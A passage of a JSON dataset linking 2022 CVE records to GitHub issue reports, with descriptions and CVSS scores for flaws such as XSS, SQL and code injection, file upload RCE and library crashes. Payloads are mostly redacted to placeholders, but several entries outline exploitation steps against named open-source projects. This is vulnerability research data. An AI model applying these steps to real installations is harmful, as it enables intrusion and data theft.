  82347. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/63",
  82348. "Repo_new": "havok89/hoosk",
  82349. "Issue_Created_At": "2022-04-01T05:25:15Z",
  82350. "description": "XSS on Hoosk NUMBERTAG This vulnerability in edit page function FILETAG Exploit with using \"heading\" attribute, we can custom HTML tag lead to inject img tag with ERRORTAG event, and use HTML encoding to bypass filter some special chars FILETAG APITAG FILETAG",
  82351. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82352. "severity": "MEDIUM",
  82353. "baseScore": 6.1,
  82354. "impactScore": 2.7,
  82355. "exploitabilityScore": 2.8
  82356. },
  82357. {
  82358. "CVE_ID": "CVE-2022-28588",
  82359. "Issue_Url_old": "https://github.com/lkmc2/SpringBootMovie/issues/3",
  82360. "Issue_Url_new": "https://github.com/lkmc2/springbootmovie/issues/3",
  82361. "Repo_new": "lkmc2/springbootmovie",
  82362. "Issue_Created_At": "2022-04-01T09:38:04Z",
  82363. "description": "A backend stored XSS vulnerability (original title: \u4e00\u4e2a\u540e\u53f0\u5b58\u50a8\u578bxss\u6f0f\u6d1e). When adding movie names, malicious code can be stored because the parameters are not filtered. Affected version NUMBERTAG Test: FILETAG The trigger: FILETAG The main reason is that the code does not filter parameter values: FILETAG",
  82364. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82365. "severity": "MEDIUM",
  82366. "baseScore": 5.4,
  82367. "impactScore": 2.7,
  82368. "exploitabilityScore": 2.3
  82369. },
  82370. {
  82371. "CVE_ID": "CVE-2022-28589",
  82372. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/23",
  82373. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/23",
  82374. "Repo_new": "pixelimity/pixelimity",
  82375. "Issue_Created_At": "2022-04-01T13:22:07Z",
  82376. "description": "Cross Site Scripting (XSS) in APITAG A Cross Site Scripting vulnerability exists in Pixelimity via the Page Title field in PATHTAG Steps to exploit NUMBERTAG Login as admin NUMBERTAG Navigate to FILETAG and click on Add New NUMBERTAG Insert XSS payload ( APITAG alert NUMBERTAG APITAG ) in the APITAG field and click on Publish Page. FILETAG FILETAG Proof of concept APITAG APITAG alert NUMBERTAG APITAG",
  82377. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  82378. "severity": "MEDIUM",
  82379. "baseScore": 4.8,
  82380. "impactScore": 2.7,
  82381. "exploitabilityScore": 1.7
  82382. },
  82383. {
  82384. "CVE_ID": "CVE-2022-28590",
  82385. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/24",
  82386. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/24",
  82387. "Repo_new": "pixelimity/pixelimity",
  82388. "Issue_Created_At": "2022-04-02T10:07:05Z",
  82389. "description": "A Remote Code Execution (RCE) vulnerability exists in pixelimity via admin/admin APITAG A Remote Code Execution (RCE) vulnerability exists in pixelimity via admin/admin APITAG Steps to exploit NUMBERTAG Login as admin NUMBERTAG Navigate to FILETAG NUMBERTAG Compress APITAG into a APITAG file and then upload it via Install New Theme NUMBERTAG Visit FILETAG FILETAG FILETAG FILETAG",
  82390. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  82391. "severity": "HIGH",
  82392. "baseScore": 7.2,
  82393. "impactScore": 5.9,
  82394. "exploitabilityScore": 1.2
  82395. },
  82396. {
  82397. "CVE_ID": "CVE-2022-28599",
  82398. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/595",
  82399. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/595",
  82400. "Repo_new": "daylightstudio/fuel-cms",
  82401. "Issue_Created_At": "2022-04-02T09:29:18Z",
  82402. "description": "A stored cross site scripting (XSS) vulnerability exists in FUEL CMS NUMBERTAG A stored cross site scripting (XSS) vulnerability exists in FUEL CMS NUMBERTAG that allows an authenticated user who is authorized to upload assets to upload a malicious file that acts as a stored XSS payload (the report calls it a .pdf, but the uploaded asset shown is cookie.svg). If this stored XSS payload is triggered by an administrator it will trigger an XSS attack NUMBERTAG login as admin, in the Assets page FILETAG NUMBERTAG upload the malicious file; the content of FILETAG : CODETAG FILETAG NUMBERTAG back to Assets, then we can see xss cookie.svg has been uploaded: FILETAG NUMBERTAG when a user clicks the FILETAG it will trigger an XSS attack FILETAG",
  82403. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82404. "severity": "MEDIUM",
  82405. "baseScore": 5.4,
  82406. "impactScore": 2.7,
  82407. "exploitabilityScore": 2.3
  82408. },
  82409. {
  82410. "CVE_ID": "CVE-2022-28918",
  82411. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/116",
  82412. "Issue_Url_new": "https://github.com/greencms/greencms/issues/116",
  82413. "Repo_new": "greencms/greencms",
  82414. "Issue_Created_At": "2022-04-04T10:10:50Z",
  82415. "description": "There is an arbitrary file deletion vulnerability here: APITAG Vulnerability file: PATHTAG FILETAG Vulnerability to reproduce: APITAG log in to the background APITAG url: URLTAG APITAG delete the NUMBERTAG folder in the root directory\uff0cconstruct the packet as follows: APITAG GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG Repair suggestion: APITAG ../ and ..\\\\ APITAG the range of files to delete",
  82416. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  82417. "severity": "HIGH",
  82418. "baseScore": 8.1,
  82419. "impactScore": 5.2,
  82420. "exploitabilityScore": 2.8
  82421. },
  82422. {
  82423. "CVE_ID": "CVE-2022-28919",
  82424. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/3651",
  82425. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/3651",
  82426. "Repo_new": "dokuwiki/dokuwiki",
  82427. "Issue_Created_At": "2022-03-30T10:23:12Z",
  82428. "description": "Possible XSS vulnerability. Hello, I would like to report for possible XSS vulnerability. The source in this file FILETAG Line NUMBERTAG in function APITAG While the sink in this FILETAG line NUMBERTAG I tried to test the pathinfo function in PHP. And I found it is possible to bypass this function with this example. ERRORTAG",
  82429. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82430. "severity": "MEDIUM",
  82431. "baseScore": 6.1,
  82432. "impactScore": 2.7,
  82433. "exploitabilityScore": 2.8
  82434. },
  82435. {
  82436. "CVE_ID": "CVE-2022-28920",
  82437. "Issue_Url_old": "https://github.com/MoeNetwork/Tieba-Cloud-Sign/issues/156",
  82438. "Issue_Url_new": "https://github.com/moenetwork/tieba-cloud-sign/issues/156",
  82439. "Repo_new": "moenetwork/tieba-cloud-sign",
  82440. "Issue_Created_At": "2022-04-06T12:16:33Z",
  82441. "description": "Possible XSS vulnerability. Hello, I would like to report an XSS vulnerability. In file FILETAG line NUMBERTAG APITAG Then there is an echo at line NUMBERTAG APITAG strip_tags is not secure in this case. If you look at this code example, the alert fires when you click the link. APITAG",
  82442. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  82443. "severity": "MEDIUM",
  82444. "baseScore": 4.8,
  82445. "impactScore": 2.7,
  82446. "exploitabilityScore": 1.7
  82447. },
  82448. {
  82449. "CVE_ID": "CVE-2022-28936",
  82450. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2307",
  82451. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2307",
  82452. "Repo_new": "fisco-bcos/fisco-bcos",
  82453. "Issue_Created_At": "2022-03-28T12:35:44Z",
  82454. "description": "A malicious node may fake a proposal's header when he is the leader and some transactions cannot be processed. Describe the bug I setup a group of NUMBERTAG nodes under NUMBERTAG rc2 version. One of the nodes is a malicious one and tries to modify some fields when it sends out some packages. Then I use the following command to test the system: APITAG Then some transactions cannot be processed successfully. To Reproduce Steps to reproduce the behavior NUMBERTAG setup a NUMBERTAG nodes group NUMBERTAG start the press test program NUMBERTAG See the error Expected behavior All the transactions should be processed correctly. Screenshots The information of the log: APITAG Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG rc2",
  82455. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82456. "severity": "HIGH",
  82457. "baseScore": 7.5,
  82458. "impactScore": 3.6,
  82459. "exploitabilityScore": 3.9
  82460. },
  82461. {
  82462. "CVE_ID": "CVE-2022-28937",
  82463. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2312",
  82464. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2312",
  82465. "Repo_new": "fisco-bcos/fisco-bcos",
  82466. "Issue_Created_At": "2022-03-29T03:14:29Z",
  82467. "description": "A malicious node becomes a leader and sets the view to a very large value, so blocks cannot be processed. Describe the bug I set up a group with NUMBERTAG nodes. One of them is malicious. First, the malicious node starts, and after that all the other nodes start. Then I start the press testing program to send transactions to the group. And it gets stuck here: APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG setup NUMBERTAG nodes NUMBERTAG start press testing program NUMBERTAG the bug occurs Expected behavior The system should not get stuck and should keep changing the view. Screenshots APITAG APITAG Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG rc2 Additional context There may be an integer overflow during the view change, and the malicious node can always be the leader.",
  82468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82469. "severity": "HIGH",
  82470. "baseScore": 7.5,
  82471. "impactScore": 3.6,
  82472. "exploitabilityScore": 3.9
  82473. },
  82474. {
  82475. "CVE_ID": "CVE-2022-28945",
  82476. "Issue_Url_old": "https://github.com/WeBankPartners/wecube-platform/issues/2324",
  82477. "Issue_Url_new": "https://github.com/webankpartners/wecube-platform/issues/2324",
  82478. "Repo_new": "webankpartners/wecube-platform",
  82479. "Issue_Created_At": "2022-05-30T07:34:35Z",
  82480. "description": "zip slip . \u89e3\u538b\u6587\u4ef6\u65f6\u672a\u5bf9 ../ \u8fdb\u884c\u6821\u9a8c Demo\uff1a ERRORTAG",
  82481. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82482. "severity": "CRITICAL",
  82483. "baseScore": 9.8,
  82484. "impactScore": 5.9,
  82485. "exploitabilityScore": 3.9
  82486. },
  82487. {
  82488. "CVE_ID": "CVE-2022-28948",
  82489. "Issue_Url_old": "https://github.com/go-yaml/yaml/issues/666",
  82490. "Issue_Url_new": "https://github.com/go-yaml/yaml/issues/666",
  82491. "Repo_new": "go-yaml/yaml",
  82492. "Issue_Created_At": "2020-10-21T17:29:20Z",
  82493. "description": "NUMBERTAG panic \"attempted to parse unknown event (please report): none\". Hi folks \ud83d\udc4b\ud83c\udffb Found this panic (along with NUMBERTAG ) while fuzzing my own project. Minimal example of the panic ( URLTAG ): ERRORTAG Output: ERRORTAG",
  82494. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82495. "severity": "HIGH",
  82496. "baseScore": 7.5,
  82497. "impactScore": 3.6,
  82498. "exploitabilityScore": 3.9
  82499. },
  82500. {
  82501. "CVE_ID": "CVE-2022-28966",
  82502. "Issue_Url_old": "https://github.com/wasm3/wasm3/issues/320",
  82503. "Issue_Url_new": "https://github.com/wasm3/wasm3/issues/320",
  82504. "Repo_new": "wasm3/wasm3",
  82505. "Issue_Created_At": "2022-04-07T06:41:07Z",
  82506. "description": "FILETAG ERRORTAG",
  82507. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  82508. "severity": "MEDIUM",
  82509. "baseScore": 5.5,
  82510. "impactScore": 3.6,
  82511. "exploitabilityScore": 1.8
  82512. },
  82513. {
  82514. "CVE_ID": "CVE-2022-28985",
  82515. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1217",
  82516. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1217",
  82517. "Repo_new": "orangehrm/orangehrm",
  82518. "Issue_Created_At": "2022-04-07T12:40:53Z",
  82519. "description": "Stored XSS in APITAG Status\" section under APITAG via the GET/POST parameters APITAG and APITAG . Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug Insufficient input validation in the Buzz APITAG API results in a Stored Cross Site Scripting attack. An attacker who is an authenticated user can craft a malicious request causing malicious JavaScript to execute in the browser of any other user. The malicious JavaScript can trigger when a victim user visits the Buzz page. To Reproduce NUMBERTAG Authenticate to the user dashboard NUMBERTAG Visit APITAG page NUMBERTAG Collect the CSRF token from the HTML response. It can be found in an 'input' field with the id APITAG . Example : APITAG NUMBERTAG Collect the logged in user cookie APITAG NUMBERTAG Fire the following POST request including the CSRF token and cookie obtained. Replace the Host header too : CODETAG NUMBERTAG Click on the link 'xss' in the most recent post. Expected behavior The values of parameters APITAG and APITAG should be validated by the API and an error should be thrown. What do you see instead: The malicious payload gets submitted successfully and gets stored in the post made by the user. Screenshots FILETAG FILETAG Technical Details A logged in user can post status updates to their buzz feed. From the front end application a user will be able to post a text within a single field which says APITAG on your mind\" to the buzz feed. This happens via a POST request to the URL APITAG through the APITAG request body parameter. While investigating this API, we found that there are extra parameter fields in the body of this API which are not directly exposed through the frontend application. The following request body parameters found in the API result in certain profound effects in the HTML response sent by the server NUMBERTAG APITAG Causes the addition of an APITAG anchor tag in the response with id APITAG & with attribute src with the value set for the APITAG parameter NUMBERTAG APITAG Causes an APITAG anchor tag in the response with id APITAG which is clickable and displayed with the text content sent in the above request parameter. Combining the above NUMBERTAG parameters, it's possible to get an anchor HTML tag with a visible clickable text and a desired URL as src which is clickable. The URL payload could be javascript as APITAG . This can result in execution of arbitrary malicious JavaScript code on the client side if the victim clicks on this link. The impact of this can be severe since this particular code gets stored in the database and gets delivered to the feed of every logged in user in APITAG Every user will have this delivered through their APITAG feed. In terms of impact, this vulnerability enables an attacker to steal the CSRF token and perform arbitrary actions on the website on behalf of the victim user.",
  82520. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82521. "severity": "MEDIUM",
  82522. "baseScore": 5.4,
  82523. "impactScore": 2.7,
  82524. "exploitabilityScore": 2.3
  82525. },
  82526. {
  82527. "CVE_ID": "CVE-2022-28995",
  82528. "Issue_Url_old": "https://github.com/zongdeiqianxing/rengine/issues/1",
  82529. "Issue_Url_new": "https://github.com/zongdeiqianxing/rengine/issues/1",
  82530. "Repo_new": "zongdeiqianxing/rengine",
  82531. "Issue_Created_At": "2022-04-08T01:48:22Z",
  82532. "description": "URLTAG rce report. URLTAG Hello, I found that there is an RCE vulnerability in the YAML configuration function in rengine NUMBERTAG version. The YAML file can be written arbitrarily, and the backend code passes it directly into an os.system statement without any validation or filtering, which leads to this vulnerability. Take 'dirsearch' as an example . FILETAG FILETAG FILETAG ============== It should be noted that the program must scan subdomains by default before performing the dirsearch scan, so you need to wait for a while when trying to exploit the RCE FILETAG FILETAG FILETAG FILETAG",
  82533. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82534. "severity": "CRITICAL",
  82535. "baseScore": 9.8,
  82536. "impactScore": 5.9,
  82537. "exploitabilityScore": 3.9
  82538. },
  82539. {
  82540. "CVE_ID": "CVE-2022-29001",
  82541. "Issue_Url_old": "https://github.com/lkmc2/SpringBootMovie/issues/4",
  82542. "Issue_Url_new": "https://github.com/lkmc2/springbootmovie/issues/4",
  82543. "Repo_new": "lkmc2/springbootmovie",
  82544. "Issue_Created_At": "2022-04-08T08:49:20Z",
  82545. "description": "Arbitrary file upload vulnerability. Affected version NUMBERTAG Upload a malicious file with the suffix .php FILETAG Published successfully FILETAG Vulnerable code\uff1a FILETAG The reason for the vulnerability is that the file extension is not validated here",
  82546. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  82547. "severity": "HIGH",
  82548. "baseScore": 7.2,
  82549. "impactScore": 5.9,
  82550. "exploitabilityScore": 1.2
  82551. },
  82552. {
  82553. "CVE_ID": "CVE-2022-29017",
  82554. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/691",
  82555. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/691",
  82556. "Repo_new": "axiomatic-systems/bento4",
  82557. "Issue_Created_At": "2022-04-10T14:50:23Z",
  82558. "description": "APITAG SEGV PATHTAG . SUMMARY: APITAG SEGV PATHTAG Version CODETAG branch NUMBERTAG d8e1fc Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks !!",
  82559. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  82560. "severity": "MEDIUM",
  82561. "baseScore": 5.5,
  82562. "impactScore": 3.6,
  82563. "exploitabilityScore": 1.8
  82564. },
  82565. {
  82566. "CVE_ID": "CVE-2022-29020",
  82567. "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/76",
  82568. "Issue_Url_new": "https://github.com/saysky/forestblog/issues/76",
  82569. "Repo_new": "saysky/forestblog",
  82570. "Issue_Created_At": "2022-04-10T10:25:04Z",
  82571. "description": "XSS attacks occur when user profile pictures are updated. APITAG user information and save it FILETAG APITAG profile picture address in the packet capture request is changed",
  82572. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82573. "severity": "MEDIUM",
  82574. "baseScore": 6.1,
  82575. "impactScore": 2.7,
  82576. "exploitabilityScore": 2.8
  82577. },
  82578. {
  82579. "CVE_ID": "CVE-2022-29080",
  82580. "Issue_Url_old": "https://github.com/barneycarroll/npm-dependency-versions/issues/6",
  82581. "Issue_Url_new": "https://github.com/barneycarroll/npm-dependency-versions/issues/6",
  82582. "Repo_new": "barneycarroll/npm-dependency-versions",
  82583. "Issue_Created_At": "2022-04-06T19:49:43Z",
  82584. "description": "Potential command injection vulnerability in npm dependency versions. Hi, Thanks for developing this great npm package! We found a potential command injection vulnerability in it. The bug is caused by the fact that the package's exported method fails to sanitize the pkgs parameter and lets it flow into a sensitive command execution API. Here is the proof of concept. APITAG Please consider fixing it. Thanks!",
  82585. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82586. "severity": "CRITICAL",
  82587. "baseScore": 9.8,
  82588. "impactScore": 5.9,
  82589. "exploitabilityScore": 3.9
  82590. },
  82591. {
  82592. "CVE_ID": "CVE-2022-29185",
  82593. "Issue_Url_old": "https://github.com/constantoine/totp-rs/issues/13",
  82594. "Issue_Url_new": "https://github.com/constantoine/totp-rs/issues/13",
  82595. "Repo_new": "constantoine/totp-rs",
  82596. "Issue_Created_At": "2022-04-24T07:41:34Z",
  82597. "description": "Unsafe token check. Currently, a simple string comparison in the check method is used to validate the token. To resist timing attacks, a constant-time comparison must be used instead. Details URLTAG",
  82598. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N",
  82599. "severity": "MEDIUM",
  82600. "baseScore": 4.4,
  82601. "impactScore": 3.6,
  82602. "exploitabilityScore": 0.7
  82603. },
  82604. {
  82605. "CVE_ID": "CVE-2022-29202",
  82606. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/55199",
  82607. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/55199",
  82608. "Repo_new": "tensorflow/tensorflow",
  82609. "Issue_Created_At": "2022-03-11T09:56:38Z",
  82610. "description": "Missing input validation on APITAG . APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: APITAG installed from (source or binary): APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): APITAG version (if compiling from source): APITAG version: using a colab notebook GPU model and memory: using a colab notebook You can collect some of this information using our environment capture FILETAG You can also obtain the APITAG version with NUMBERTAG TF NUMBERTAG APITAG NUMBERTAG TF NUMBERTAG APITAG Describe the current behavior All RAM is consumed, causing the notebook to crash Describe the expected behavior Some input validation should be done and an exception thrown. Contributing URLTAG Do you want to contribute a PR? (yes/no): Briefly describe your candidate solution(if contributing): Standalone code to reproduce the issue Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to PATHTAG notebook. The colab notebook: URLTAG APITAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached.",
  82611. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  82612. "severity": "MEDIUM",
  82613. "baseScore": 5.5,
  82614. "impactScore": 3.6,
  82615. "exploitabilityScore": 1.8
  82616. },
  82617. {
  82618. "CVE_ID": "CVE-2022-29211",
  82619. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/45770",
  82620. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/45770",
  82621. "Repo_new": "tensorflow/tensorflow",
  82622. "Issue_Created_At": "2020-12-17T00:40:20Z",
  82623. "description": "Segmentation fault in tf.histogram_fixed_width. APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crashes (segmentation fault) when values contain nan Describe the expected behavior Expect no crash Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG value_range NUMBERTAG",
  82624. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  82625. "severity": "MEDIUM",
  82626. "baseScore": 5.5,
  82627. "impactScore": 3.6,
  82628. "exploitabilityScore": 1.8
  82629. },
  82630. {
  82631. "CVE_ID": "CVE-2022-29212",
  82632. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/43661",
  82633. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/43661",
  82634. "Repo_new": "tensorflow/tensorflow",
  82635. "Issue_Created_At": "2020-09-30T01:56:21Z",
  82636. "description": "Core dumped when invoking APITAG model converted using latest nightly APITAG converter NUMBERTAG de NUMBERTAG System information OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG APITAG installed from (source or binary): binary APITAG version (or github SHA if from source NUMBERTAG de NUMBERTAG Command used to run the converter or code if you\u2019re using the Python API ERRORTAG Link to Google Colab Notebook APITAG The output from the converter invocation ERRORTAG Also, please include a link to the saved model or APITAG APITAG Failure details The conversion is successful in that it generates a tflite graph. However, when I invoke the graph, I get a core dump error NUMBERTAG abort (core dumped) python APITAG Any other info / logs CODETAG Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. Traceback ERRORTAG",
  82637. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  82638. "severity": "MEDIUM",
  82639. "baseScore": 5.5,
  82640. "impactScore": 3.6,
  82641. "exploitabilityScore": 1.8
  82642. },
  82643. {
  82644. "CVE_ID": "CVE-2022-29213",
  82645. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/55263",
  82646. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/55263",
  82647. "Repo_new": "tensorflow/tensorflow",
  82648. "Issue_Created_At": "2022-03-17T05:41:45Z",
  82649. "description": "APITAG and APITAG lacks input validation leading to crashes. System information Have I written custom code (as opposed to using a stock example script provided in APITAG Yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG N/A Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python APITAG Bazel version (if compiling from source): APITAG version (if compiling from source): APITAG version NUMBERTAG based on a colab notebook) GPU model and memory: Tesla T4, APITAG (based on a colab notebook) Describe the current behavior The following code snippets lead to crashes when executed: CODETAG and CODETAG In either case, the inputs do not quite make sense, and tensorflow should throw. Describe the expected behavior Tensorflow should throw exceptions instead of crashing. Contributing URLTAG Do you want to contribute a PR? (yes/no): Briefly describe your candidate solution(if contributing): Standalone code to reproduce the issue Here is a colab notebook: URLTAG The code snippets above should also reproduce the issue.",
  82650. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  82651. "severity": "MEDIUM",
  82652. "baseScore": 5.5,
  82653. "impactScore": 3.6,
  82654. "exploitabilityScore": 1.8
  82655. },
  82656. {
  82657. "CVE_ID": "CVE-2022-29305",
  82658. "Issue_Url_old": "https://github.com/helloxz/imgurl/issues/75",
  82659. "Issue_Url_new": "https://github.com/helloxz/imgurl/issues/75",
  82660. "Repo_new": "helloxz/imgurl",
  82661. "Issue_Created_At": "2022-04-11T09:19:12Z",
  82662. "description": "Blind SQL Injection Vulnerability . Description \uff08\u6f0f\u6d1e\u63cf\u8ff0\uff09 imgurl NUMBERTAG Multiple ways are used to obtain user ip \uff08\u4f7f\u7528\u4e86\u591a\u79cd\u65b9\u6cd5\u83b7\u53d6\u7528\u6237ip\uff09 FILETAG Then splice the user ip directly into the sql statement in lines NUMBERTAG to NUMBERTAG of APITAG FILETAG query >uplimit($ip) FILETAG Proof of Concept ERRORTAG FILETAG FILETAG Command for injection using sqlmap ERRORTAG FILETAG Repair method \uff08\u4fee\u590d\u65b9\u6cd5\uff09 Check user ip format or use PDO to prevent sql injection \uff08\u68c0\u67e5\u7528\u6237ip\u683c\u5f0f\u6216\u4f7f\u7528PDO\u6765\u9632\u6b62sql\u6ce8\u5165\uff09",
  82663. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82664. "severity": "HIGH",
  82665. "baseScore": 8.1,
  82666. "impactScore": 5.9,
  82667. "exploitabilityScore": 2.2
  82668. },
  82669. {
  82670. "CVE_ID": "CVE-2022-29306",
  82671. "Issue_Url_old": "https://github.com/ionize/ionize/issues/404",
  82672. "Issue_Url_new": "https://github.com/ionize/ionize/issues/404",
  82673. "Repo_new": "ionize/ionize",
  82674. "Issue_Created_At": "2022-04-11T09:26:21Z",
  82675. "description": "APITAG NUMBERTAG Unverified post request parameters lead to sql injection. APITAG Exploit Title: APITAG NUMBERTAG Unverified post request parameters lead to sql injection Exploit date NUMBERTAG Exploit Author: EMAILTAG Vendor Homepage: URLTAG Affect Version NUMBERTAG Description: SQL injection in Ionize CMS NUMBERTAG allows attackers to execute commands remotely via a sql injection request from client. APITAG to Exploit Construct normal packet and send. In the image below, you can see that there is a NUMBERTAG second network delay. APITAG Construct the injected data to execute APITAG . It can be found that the delay is more than NUMBERTAG seconds. It is speculated that there are NUMBERTAG records in total, so APITAG is executed NUMBERTAG times. APITAG Construct the injection again to execute APITAG , this time with a delay of APITAG seconds if the guess is correct. APITAG APITAG Validate the parameters in the post request to avoid SQL injection",
  82676. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82677. "severity": "CRITICAL",
  82678. "baseScore": 9.8,
  82679. "impactScore": 5.9,
  82680. "exploitabilityScore": 3.9
  82681. },
  82682. {
  82683. "CVE_ID": "CVE-2022-29307",
  82684. "Issue_Url_old": "https://github.com/ionize/ionize/issues/405",
  82685. "Issue_Url_new": "https://github.com/ionize/ionize/issues/405",
  82686. "Repo_new": "ionize/ionize",
  82687. "Issue_Created_At": "2022-04-11T09:45:52Z",
  82688. "description": "APITAG NUMBERTAG Unverified post request parameters lead to code injection. APITAG Exploit Title: APITAG NUMBERTAG Unverified post request parameters lead to code injection Exploit date NUMBERTAG Exploit Author: EMAILTAG Vendor Homepage: URLTAG Affect Version NUMBERTAG Description: Code injection in Ionize CMS NUMBERTAG allows attackers to execute commands remotely via a code injection request from the client. APITAG Description The exploitable code is located in the project's PATHTAG file. In the copy_lang_content method, the code is as follows. The POST parameter 'from' is concatenated into the function content parameter of the ERRORTAG function without any processing or checking, resulting in a code injection vulnerability APITAG APITAG to Exploit Construct the attack packet to achieve the effect of executing the whoami command. APITAG APITAG Validate the parameters in the post request to avoid Code injection",
